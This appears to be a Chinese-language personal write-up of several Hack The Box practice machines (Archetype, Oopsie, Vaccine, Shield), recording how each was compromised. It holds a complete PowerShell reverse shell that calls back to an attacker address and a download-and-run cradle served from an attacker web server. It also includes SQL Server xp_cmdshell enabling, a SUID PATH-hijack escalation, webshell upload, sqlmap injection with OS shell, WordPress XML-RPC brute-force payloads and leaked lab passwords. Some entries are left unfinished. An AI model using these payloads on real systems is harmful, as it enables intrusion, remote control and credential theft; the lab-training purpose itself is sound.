文章目录
- Archetype
- 得到一个SSIS
- 通msf连接
- 通过 impacket 工具连接
- Oopsie
- 80
- 越权
- Vaccine
- get注入
- Shield
- xmlrpc 未授权访问
- 待续
Archetype
得到一个SSIS
SQL Server Integration Services 配置文件,和账户密码
百度前辈解题步骤,SQLServer 身份验证方式为 操作系统身份验证
通msf连接
开启xp_cmdshell
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
xp_cmdshell "net user"持续浏览目录找到user.txt
建立一个反向 shell 文件
$client = New-Object System.Net.Sockets.TCPClient("10.10.16.37",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 |
Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()开启80端口,监听本地443
python3 -m http.server 80回到数据库下载shell
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.16.37/shell.ps1\");"
powershell历史命令文件
psexec.py administrator@10.10.10.27
C:\Users\Administrator\Desktop>type root.txt
Oopsie
80
目录都被重定向了,无果
爆破无果,百度说是 Archetype administator密码 MEGACORP_4dm1n!!
越权
页面有两个cookie
一个是admin,一个是一个id
其中,user id 跟页面的Access ID 是一样的
拿到super admin cookie
ubuntu,php主机 上传一张图片上去试试
找到之前扫描出来的路径
丢一句话上去
连上去后很快就没了,不知道是公共靶机的原因还是被杀了,但我还是拿到了数据库账户密码和 user.txt
然后尝试使用数据库账户密码登录 ssh
SUID 提权
id
find / -perm -u=s -type f 2>/dev/null
find / -type f -group bugtracker 2>/dev/null
bugtracker cat 命令 输出了位于/root/reports/目录下的bug报告
$ vim /home/robert/.bashrc
$ PATH=$PATH:/home/robert
$ source /home/robert/.bashrc
$ vim /home/robert/cat
'/bin/sh'
$ bugtracker
$ less /root/root.txt
最后参考了别人的教程,用的kali自己的反向连接shell
php-reverse-shell.php
Vaccine
80
目录
另一个登录页面
在尝试爆破,sql注入后依旧无果,我百度了教程,说这个题的切入点需要上一题的 ftp 密码(是我不配了)
然后这玩意需要密码
zip爆破
解压密码 : 741852963
$ zip2john backup.zip > zippass
$ john zippass --show
账户密码 : admin/qwerty789
get注入
丢sqlmap
sqlmap -u "http://10.10.10.46/dashboard.php?search=1%27+orderby+7--%2B" --cookie="PHPSESSID=8820199ppmhore9f0pcdhb5bhg"
sqlmap -u "http://10.10.10.46/dashboard.php?search=1%27+orderby+7--%2B" --cookie="PHPSESSID=8820199ppmhore9f0pcdhb5bhg" -dbs
sqlmap -u "http://10.10.10.46/dashboard.php?search=1%27+orderby+7--%2B" --cookie="PHPSESSID=8820199ppmhore9f0pcdhb5bhg" --os-shellls
没有找到更多信息,待续。
Shield
gobuster dir -u http://10.10.10.29/ -w /usr/share/dict/wordlist-probable.txt -t 50
python3 dirsearch.py -u http://10.10.10.29/
xmlrpc 未授权访问
wpscan 得到一个 xmlrpc 未授权访问
https://www.seebug.org/vuldb/ssvid-3562
绕过 wordpress登录接口防暴力破解
密码错误返回 403 正确 返回 0
爆破
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>查询能利用的方法
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>我测试过,这里应该还有一个 SSRF 服务端请求伪造,但是返回参数并不正确,如果存在,它应该返回 大于 0 的数值,我也没找我参数错误的地方,如果有利用成功的师傅,欢迎与我交流。
https://www.secpulse.com/archives/65563.html
https://github.com/FireFart/WordpressPingbackPortScanner
待续
